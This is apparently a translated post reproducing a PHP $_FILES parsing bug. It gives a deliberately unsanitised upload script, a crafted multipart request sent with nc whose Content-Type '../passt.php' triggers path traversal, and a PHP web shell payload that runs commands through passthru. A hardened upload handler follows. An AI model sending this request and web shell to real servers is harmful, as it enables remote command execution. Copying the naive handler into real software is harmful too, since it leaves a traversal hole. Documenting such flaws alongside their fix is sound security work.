Original source: http://www.wisec.it/news.php?page=1&lang=it
I couldn't really follow the foreign-language write-up, but after some poking around it turns out to be a problem with how the elements of the $_FILES array are parsed.
I set up a PHP environment with the web directory at C:\www; in that root directory there is an upload.php with the following code:
<?php
// Deliberately naive handler used for the reproduction: the destination path is
// built by concatenating the client-supplied file name onto the upload directory
// with no sanitisation, so a name such as "../passt.php" escapes c:/www/.
$uploaddir = 'c:/www/';
$uploadfile = $uploaddir . $_FILES['user_file']['name'];
print "<pre>";
// is_uploaded_file() only confirms the temp file was created by this request;
// it says nothing about where the file is about to be moved.
if (is_uploaded_file($_FILES['user_file']['tmp_name']) && move_uploaded_file($_FILES['user_file']['tmp_name'], $uploadfile)) {
    print "File is valid, and was successfully uploaded. ";
    print "Here's some more debugging info:\n";
    print_r($_FILES);
} else {
    print "Possible file upload attack! Here's some debugging info:\n";
    print_r($_FILES);
}
print "</pre>";
?>
Using nc, I sent a modified request with an extra part added (let's just call it a part; you should be able to see what I mean). The main change is the value of its Content-Type header. The request sent was:
POST /upload.php HTTP/1.1
Accept: */*
Referer: http://localhost/upload.html
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d915736b07cc
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: localhost
Content-Length: 477
Connection: Keep-Alive
Cache-Control: no-cache

-----------------------------7d915736b07cc
Content-Disposition: form-data; name="user[file[name]123"; filename="a.php"
Content-Type: ../passt.php

<?php
passthru($_GET['cmd']);
?>
-----------------------------7d915736b07cc--
-----------------------------7d915736b07cc
Content-Disposition: form-data; name="user[file[name]123"; filename="vg"
Content-Type: application/octet-stream

<?php
passthru($_GET['cmd']);
?>
-----------------------------7d915736b07cc--
The response was:
C:\>nc localhost 80 <up.txt
HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 03:44:33 GMT
Server: Apache/2.0.50 (Win32) PHP/5.0.0
X-Powered-By: PHP/5.0.0
Content-Length: 284
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
<pre>File is valid, and was successfully uploaded. Here's some more debugging info:
Array
(
[user_file] => Array
(
[name] => ../passt.php
[tmp_name] => C:\WINDOWS\TEMP\php248.tmp
[error] => 0
[size] => 34
)
)
</pre>^C
C:\>
Afterwards, the uploaded passt.php can be seen in the C:\ root directory.
What can you do with it? No idea, don't ask me, I don't know anything.
(This needs $_FILES, and the variable name must contain an underscore "_", here it is "user_file". I haven't had time to look into it in detail.)
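For comparison, here is an added example (mine, not code from the original post or from the wisec.it advisory) of the same upload handler rewritten so that the client-controlled entries of $_FILES never decide where the file lands or what it is called. It assumes an upload directory outside the web root (C:/www_uploads/ is a placeholder), a small allowlist of types, a form field named "user_file", and PHP 7.0 or later for finfo and random_bytes().

```php
<?php
// Hardened version of the upload.php reproduced above (added example).
// $_FILES[...]['name'] is never used for the destination, so a corrupted
// name such as "../passt.php" cannot steer the file out of the upload
// directory or choose its extension.
$uploadDir = 'C:/www_uploads/';   // assumed: a directory outside the web root
$allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'pdf' => 'application/pdf'];

// Returns the server-generated file name on success, or null when rejected.
function store_upload(array $file, string $uploadDir, array $allowed): ?string
{
    // 1. Reject anything PHP itself reports as a failed or partial upload.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // 2. Only accept a temp path that PHP created during this request.
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 3. Derive the type from the file's bytes, not from the client's
    //    Content-Type header or from the extension in $file['name'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    $ext = array_search($mime, $allowed, true);
    if ($ext === false) {
        return null;
    }
    // 4. Generate the stored name server-side; no client string reaches the path.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $uploadDir . $stored)) {
        return null;
    }
    return $stored;
}

$stored = isset($_FILES['user_file'])
    ? store_upload($_FILES['user_file'], $uploadDir, $allowed)
    : null;

header('Content-Type: text/plain');
if ($stored === null) {
    http_response_code(400);
    echo "Upload rejected.\n";
} else {
    // Report only the generated name; never echo the raw $_FILES array.
    echo "Stored as " . $stored . "\n";
}
```

Because the stored name and extension come from the server, the traversal shown in the post is blocked even on a PHP build where the $_FILES parsing bug is present.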